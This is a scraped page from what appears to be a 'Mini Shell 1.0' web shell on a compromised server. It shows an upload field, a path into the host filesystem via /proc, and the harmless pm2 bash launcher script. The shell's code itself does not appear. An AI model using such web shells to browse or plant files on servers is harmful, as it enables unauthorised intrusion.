HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1784574/root/usr/local/lib/node_modules/pm2/
Upload File :
Current File : //proc/1784574/root/usr/local/lib/node_modules/pm2/pm2
#!/bin/bash

SCRIPT_PATH="$(dirname "$0")/../lib/binaries/CLI.js"

# Check if 'bun' is available, otherwise use 'node'
if command -v bun &> /dev/null
then
    bun "$SCRIPT_PATH" "$@"
else
    node "$SCRIPT_PATH" "$@"
fi